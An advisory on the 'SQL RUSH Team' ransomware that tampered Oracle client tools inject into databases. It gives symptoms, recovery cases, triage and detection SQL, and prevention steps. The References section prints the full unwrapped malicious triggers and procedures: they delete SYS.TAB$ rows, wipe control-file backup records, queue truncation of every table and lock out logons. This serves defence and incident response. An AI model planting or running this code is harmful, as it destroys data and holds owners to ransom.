The "Bitcoin attack" on databases and how to defend against it


ALERT: databases are at risk of a "Bitcoin attack"

________________________________________
In this Document

Description
Occurrence
Symptoms
Workaround
Solution
References
________________________________________
APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.
DESCRIPTION
A user connecting to the database with a client tool, or the database alert log, reports an error such as ORA-20312, ORA-20313 or ORA-20315 whose text states that the database has been locked and that Bitcoin must be sent to a given address to unlock it.
OCCURRENCE
The customer connects to the database with a maliciously modified "portable" or cracked client tool (for example a cracked PL/SQL Developer or Toad). After the connection succeeds, the tool runs an injected SQL script (Login.sql, AfterConnect.sql, toad.ini and the like) that executes malicious code and creates three triggers and four stored procedures in the database. The script runs with whatever privileges the account the tool connected as holds.
When the database is restarted or a user logs on, the triggers call the corresponding stored procedures. Depending on the conditions those procedures test (the age of the database and the age of its optimizer statistics), they may damage the database, and they raise the error and ransom messages described under Symptoms.
SYMPTOMS
A user connecting to the database with a client tool, or the database alert log, reports an error such as ORA-20312, ORA-20313 or ORA-20315 stating that the database has been locked and that Bitcoin must be sent to a given address to unlock it. The injected scripts are disguised as Oracle-internal files; the injected login.sql starts with a header that imitates Oracle's own site profile script:
--
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- All rights reserved.
--
-- NAME
-- login.sql
--
-- DESCRIPTION
-- PL/SQL global login "site profile" file
--
-- Add any PL/SQL commands here that are to be executed when a
-- user starts PL/SQL, or uses the PL/SQL CONNECT command.
--
-- USAGE
-- This script is automatically run
--
-- This SQL was created by Oracle ; You should never remove/delete it!
-- MODIFIED (MM/DD/YY)
-- ……
Two known error messages are shown below. The ransom note is emitted twice, once in Chinese and once in English; the alert-log line and the procedure source in the References section are reproduced verbatim, since the strings are usable as indicators.
Example 1:
Alert.log entry:
Thu Apr 13 13:48:55 2017
Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
ORA-00604: error occurred at recursive SQL level 1
ORA-20315: 你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA-06512: at "AIQRY.DBMS_CORE_INTERNAL ", line 25
ORA-06512: at line 2
Example 2: the error is raised when a user connects to the database with a client tool.
The database contains wrapped (encrypted) stored procedures with the following names:
"DBMS_SUPPORT_INTERNAL "
"DBMS_SYSTEM_INTERNAL "
"DBMS_CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
and three triggers with the following names:
"DBMS_SUPPORT_INTERNAL "
"DBMS_CORE_INTERNAL "
"DBMS_SYSTEM_INTERNAL "
Note that the first three names are quoted identifiers that end in a space character inside the double quotes (see the trigger source in the References section). Any query or DROP statement that targets them has to quote the name exactly, trailing space included; searching for DBMS_SUPPORT_INTERNAL without the space will not find them.
WORKAROUND
None
SOLUTION
Handling for the Bitcoin attacks found so far is as follows. The case conditions use the same two quantities the injected procedures test: SYSDATE-MIN(LAST_ANALYZED), the age of the oldest optimizer statistics over ALL_TABLES outside the SYSTEM, SYSAUX and EXAMPLE tablespaces (a single table with stale statistics is enough to trip it), and SYSDATE-CREATED, the age of the database from V$DATABASE. Both thresholds are 1200 days, which is why a compromised database can appear healthy for a long time after the tampered tool was used.
1. Remove the tampered client software.
2. Handle the database according to its situation:
Case 1:
SYSDATE-MIN(LAST_ANALYZED) is less than 1200 days
Database damage: none
Handling:
a. Drop the three triggers:
"DBMS_SUPPORT_INTERNAL "
"DBMS_SYSTEM_INTERNAL "
"DBMS_CORE_INTERNAL "
b. Drop the four stored procedures:
"DBMS_SUPPORT_INTERNAL "
"DBMS_SYSTEM_INTERNAL "
"DBMS_CORE_INTERNAL "
"DBMS_STANDARD_FUN9"
Case 2:
SYSDATE-MIN(LAST_ANALYZED) is greater than 1200 days, and either SYSDATE-CREATED is greater than 1200 days but the database has not been restarted since the objects were created, or SYSDATE-CREATED is less than 1200 days
Database damage: some tables have been truncated
Handling:
a. Drop the three triggers and the four stored procedures, and remove any DBMS_JOB entries that call DBMS_STANDARD_FUN9 (the truncates are queued through DBMS_JOB, so some may still be pending)
b. Restore the truncated tables from backup to a point before the truncate
c. Use DUL to recover (not every table can necessarily be recovered, e.g. if the space freed by the truncate has already been reused)
Case 3:
SYSDATE-CREATED is greater than 1200 days and the database has been restarted since the objects were created (the STARTUP trigger has fired)
Database damage: some tables have been truncated and rows have been deleted from tab$
Handling:
a. Drop the three triggers and the four stored procedures, and remove any pending DBMS_JOB entries that call DBMS_STANDARD_FUN9
b. Restore the truncated tables from backup to a point before the truncate
c. Restore tab$ from the table whose name starts with ORACHK (the copy the payload takes before deleting)
d. Use DUL to recover (not every table can necessarily be recovered, e.g. if the space freed by the truncate has already been reused)
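The following script is an added example for triaging and cleaning a suspected database along the three cases above; it is not part of the original note. It runs as SYSDBA, which can still log on while the DATABASE-level LOGON trigger raises ORA-20313, because accounts holding ADMINISTER DATABASE TRIGGER are exempt from logon-trigger failures. The object names are the four listed in this note, trailing space included; the ORACHK% snapshot name and the DBMS_STANDARD_FUN9 job text are taken from the unwrapped procedure source in the References section. The use of the SYS-owned, undocumented DBMS_IJOB package to remove other schemas' jobs is this example's choice.

```sql
-- Added example, not the original note's text. Run as SYSDBA.
SET SERVEROUTPUT ON

-- Optional but recommended before triage: stop the job queue so that queued
-- TRUNCATE jobs cannot run while you work (restore the old value afterwards).
-- ALTER SYSTEM SET job_queue_processes = 0;

-- 1. Triage: the two ages the injected procedures test against 1200 days, whether
--    the STARTUP trigger exists, and whether the instance has been restarted since
--    the trigger was created (this separates Case 2 from Case 3).
--    DBA_TABLES is a superset of the owner's ALL_TABLES, so oldest_stats_days is
--    >= the value the procedure computes; treat >= 1200 as "may have fired".
SELECT ROUND(SYSDATE - d.created)                                    AS db_age_days,
       (SELECT ROUND(SYSDATE - MIN(last_analyzed))
          FROM dba_tables
         WHERE tablespace_name NOT IN ('SYSTEM', 'SYSAUX', 'EXAMPLE')) AS oldest_stats_days,
       (SELECT COUNT(*) FROM dba_triggers
         WHERE trigger_name = 'DBMS_SUPPORT_INTERNAL ')               AS startup_trigger_present,
       (SELECT COUNT(*) FROM dba_objects o, v$instance i
         WHERE o.object_type = 'TRIGGER'
           AND o.object_name = 'DBMS_SUPPORT_INTERNAL '
           AND i.startup_time > o.created)                            AS restarted_since_injection,
       (SELECT COUNT(*) FROM dba_objects
         WHERE object_type = 'TABLE' AND object_name LIKE 'ORACHK%')  AS tab_snapshot_tables
  FROM v$database d;

-- 2. Inventory: every copy of the injected objects, in any schema. The owner is the
--    account the tampered client connected as (AIQRY in the alert-log example).
SELECT owner, object_type, '"' || object_name || '"' AS quoted_name, created, status
  FROM dba_objects
 WHERE object_name IN ('DBMS_SUPPORT_INTERNAL ', 'DBMS_SYSTEM_INTERNAL ',
                       'DBMS_CORE_INTERNAL ', 'DBMS_STANDARD_FUN9')
 ORDER BY owner, object_type, object_name;

-- 3. TRUNCATE jobs queued by DBMS_CORE_INTERNAL that have not run yet.
SELECT job, schema_user, next_date, broken, what
  FROM dba_jobs
 WHERE UPPER(what) LIKE '%DBMS_STANDARD_FUN9%';

-- 4. Cleanup: triggers first, so nothing fires while the procedures are removed,
--    then the procedures, then the queued jobs. Keep any ORACHK% table: it is the
--    tab$ snapshot that Case 3 step c restores from.
BEGIN
  FOR t IN (SELECT owner, trigger_name
              FROM dba_triggers
             WHERE trigger_name IN ('DBMS_SUPPORT_INTERNAL ', 'DBMS_SYSTEM_INTERNAL ',
                                    'DBMS_CORE_INTERNAL ')) LOOP
    -- The quotes preserve the trailing space in the name.
    EXECUTE IMMEDIATE 'DROP TRIGGER "' || t.owner || '"."' || t.trigger_name || '"';
    DBMS_OUTPUT.PUT_LINE('dropped trigger ' || t.owner || '."' || t.trigger_name || '"');
  END LOOP;

  FOR p IN (SELECT owner, object_name
              FROM dba_objects
             WHERE object_type = 'PROCEDURE'
               AND object_name IN ('DBMS_SUPPORT_INTERNAL ', 'DBMS_SYSTEM_INTERNAL ',
                                   'DBMS_CORE_INTERNAL ', 'DBMS_STANDARD_FUN9')) LOOP
    EXECUTE IMMEDIATE 'DROP PROCEDURE "' || p.owner || '"."' || p.object_name || '"';
    DBMS_OUTPUT.PUT_LINE('dropped procedure ' || p.owner || '."' || p.object_name || '"');
  END LOOP;

  -- DBMS_JOB.REMOVE only removes the caller's own jobs; the SYS-owned, undocumented
  -- DBMS_IJOB.REMOVE removes a job belonging to any schema (assumption of this example).
  FOR j IN (SELECT job FROM dba_jobs WHERE UPPER(what) LIKE '%DBMS_STANDARD_FUN9%') LOOP
    SYS.DBMS_IJOB.REMOVE(j.job);
    DBMS_OUTPUT.PUT_LINE('removed job ' || j.job);
  END LOOP;
  COMMIT;
END;
/
```

Read the triage row as: oldest_stats_days below 1200 is Case 1; at or above 1200 with restarted_since_injection = 0 or db_age_days below 1200 is Case 2; db_age_days at or above 1200 with restarted_since_injection = 1 is Case 3, and tab_snapshot_tables then tells you whether the ORACHK copy of tab$ exists to restore from. Jobs that have already executed cannot be undone here; that is what steps b to d of the cases above are for.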
Preventive measures against the Bitcoin attack:
1. Monitor the database for the triggers and stored procedures named above and drop them as soon as they appear.
2. Restrict the use of DBA privileges. The injected script runs with whatever privileges the connecting account has, and the payload procedures either swallow privilege errors silently (WHEN OTHERS THEN NULL) or rethrow them as the ransom error, so connecting from client tools with least-privileged accounts rather than DBA accounts bounds what the script can do; in particular the DATABASE-level triggers cannot be created without the ADMINISTER DATABASE TRIGGER privilege.
3. Check the auto-run scripts of the login tools in use and remove risky scripts:
glogin.sql/login.sql for SQL*Plus
toad.ini for Toad
login.sql/AfterConnect.sql for PL/SQL Developer
4. Download tools from the vendor's official site; do not use "portable" or cracked builds.
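Measure 1 above names only the four known objects; an attacker can rename them. The query below is an added example, not part of the original note, of a periodic check for the generic traces this attack leaves: system-event triggers outside Oracle's schemas, quoted identifiers containing whitespace or lowercase characters (the trailing-space trick used here), DBMS_/UTL_ look-alike objects in application schemas, wrapped PL/SQL in application schemas, and job-queue entries that truncate or run dynamic DDL. It runs as SYSDBA. The list of Oracle-owned schemas to exclude is an assumption for this example; on 12c and later DBA_USERS.ORACLE_MAINTAINED = 'Y' is the better filter.

```sql
-- Added example, not the original note's text. Run as SYSDBA and schedule it.
WITH oracle_schemas AS (
  -- Assumed list of vendor schemas to exclude; extend it for your installation.
  SELECT column_value AS owner
    FROM TABLE(sys.odcivarchar2list('SYS', 'SYSTEM', 'XDB', 'CTXSYS', 'MDSYS', 'OLAPSYS',
                                    'ORDSYS', 'WMSYS', 'DBSNMP', 'OUTLN', 'EXFSYS', 'APPQOSSYS'))
)
-- a) STARTUP/LOGON-style triggers at DATABASE or SCHEMA level outside vendor schemas
SELECT CAST('system event trigger' AS VARCHAR2(64)) AS indicator,
       owner, trigger_name AS object_name,
       TRIM(triggering_event) || ' ON ' || base_object_type AS detail
  FROM dba_triggers
 WHERE base_object_type IN ('DATABASE', 'SCHEMA')
   AND owner NOT IN (SELECT owner FROM oracle_schemas)
UNION ALL
-- b) Names that needed double quotes: whitespace (as in "DBMS_CORE_INTERNAL ") or lowercase.
--    Match parameter 'c' forces case-sensitive matching regardless of NLS_SORT.
SELECT 'quoted identifier (whitespace or lowercase in name)',
       owner, object_name, object_type
  FROM dba_objects
 WHERE REGEXP_LIKE(object_name, '[[:space:]]|[a-z]', 'c')
   AND owner NOT IN (SELECT owner FROM oracle_schemas)
UNION ALL
-- c) Objects impersonating Oracle-supplied packages; synonyms excluded to cut noise
SELECT 'DBMS_/UTL_ look-alike outside vendor schemas',
       owner, object_name, object_type
  FROM dba_objects
 WHERE (object_name LIKE 'DBMS\_%' ESCAPE '\' OR object_name LIKE 'UTL\_%' ESCAPE '\')
   AND object_type <> 'SYNONYM'
   AND owner NOT IN (SELECT owner FROM oracle_schemas)
UNION ALL
-- d) Wrapped (obfuscated) PL/SQL in application schemas: line 1 of the source ends in "wrapped"
SELECT 'wrapped PL/SQL outside vendor schemas',
       owner, name, type
  FROM dba_source
 WHERE line = 1
   AND LOWER(text) LIKE '% wrapped%'
   AND owner NOT IN (SELECT owner FROM oracle_schemas)
UNION ALL
-- e) Job-queue entries that truncate, drop or run dynamic DDL (the payload queues
--    DBMS_STANDARD_FUN9('truncate table ...') jobs)
SELECT 'suspicious DBMS_JOB entry',
       schema_user, TO_CHAR(job), SUBSTR(what, 1, 200)
  FROM dba_jobs
 WHERE REGEXP_LIKE(what, 'truncate|drop |execute immediate|DBMS_STANDARD_FUN9', 'i')
ORDER BY 1, 2, 3;
```

Indicators b) to d) will show legitimate application objects on systems that use quoted lowercase names or ship wrapped code, so baseline the output once and alert on new rows rather than on any row. Measure 3 (the client-side login scripts) cannot be checked from inside the database; it has to be done on each workstation.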
REFERENCES
Source of the three triggers (quoted identifiers, each ending in a space), with explanatory comments:
PROMPT Create "DBMS_SUPPORT_INTERNAL "
-- Fires once at every instance startup and calls the tab$ payload. Creating a
-- DATABASE-level trigger requires the ADMINISTER DATABASE TRIGGER privilege, so this
-- step only succeeds when the tool was run from a suitably privileged account.
create or replace trigger "DBMS_SUPPORT_INTERNAL "
after startup on database
begin
"DBMS_SUPPORT_INTERNAL ";
end;
/
-- Fires for every logon to the database; its procedure raises ORA-20313 at logon,
-- which is what locks ordinary users out.
CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
AFTER LOGON ON DATABASE
BEGIN
"DBMS_SYSTEM_INTERNAL ";
END;
/
-- Fires only for logons to the schema that owns it (the schema the tampered client
-- connected as); its procedure queues the TRUNCATE jobs and raises ORA-20315.
CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
AFTER LOGON ON SCHEMA
BEGIN
"DBMS_CORE_INTERNAL ";
END;
/
The four wrapped stored procedures, unwrapped, with explanatory comments (the Chinese string literals are the same ransom note as the English text beside them):
PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
-- Trip condition: the database was created 1200 or more days ago
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
-- Copy tab$ to a table named ORACHK<guid suffix> in the SYSTEM tablespace
-- (the snapshot that Case 3 step c restores from) ...
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
-- ... then delete the tab$ rows of every table not owned by user# 0 (SYS) or 38,
-- which makes those tables vanish from the data dictionary
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
-- Clear control file record sections 11 to 14 (control file record sections hold
-- RMAN backup and recovery metadata)
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
-- Write the ransom note to the alert log 2046 times (KSDWRT destination 2 is the alert log)
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库');
END LOOP;
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20312,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
-- Any other error (for example insufficient privilege on SYS.TAB$) is swallowed silently
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
DATE1 INT :=10;
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
-- Trip condition: the oldest LAST_ANALYZED among tables outside SYSTEM, SYSAUX and
-- EXAMPLE is 1200 or more days old (NVL makes a database with no statistics evaluate to 0)
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
-- Every logon except from a client whose module name is C89239.EXE (presumably the
-- attacker's own tool) fails with ORA-20313; this is the lock-out the ransom note refers to
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20313,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
-- Any other error is swallowed silently
WHEN OTHERS THEN
NULL;
END;
/
PROCEDURE "DBMS_CORE_INTERNAL " IS
V_JOB NUMBER;
DATE1 INT :=10;
STAT VARCHAR2(2000);
V_MODULE VARCHAR2(2000);
E1 EXCEPTION;
PRAGMA EXCEPTION_INIT(E1, -20315);
-- Every table of the owning schema except dictionary-style names, the ORACHK snapshot
-- and clustered tables (a table in a cluster cannot be truncated on its own)
CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
-- Same statistics-age trip condition as DBMS_SYSTEM_INTERNAL
SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
IF (DATE1>=1200) THEN
FOR I IN TLIST LOOP
DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
-- Each TRUNCATE is queued as a DBMS_JOB that calls DBMS_STANDARD_FUN9, so the data
-- loss happens asynchronously in the job queue, not in the logon session
DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
COMMIT;
END LOOP;
END IF;
-- Here the module check sits outside the age test: every logon to this schema (other
-- than from C89239.EXE) raises ORA-20315, whatever the statistics age
IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
THEN
RAISE E1;
END IF;
EXCEPTION
WHEN E1 THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
WHEN OTHERS THEN
RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死 发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致) 之后把你的Oracle SID邮寄地址 [email protected] 我们将让你知道如何解锁你的数据库 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.');
END;
/
-- Generic dynamic-DDL runner used by the queued jobs
PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2)
IS
BEGIN
EXECUTE IMMEDIATE V_DDL;
END;
/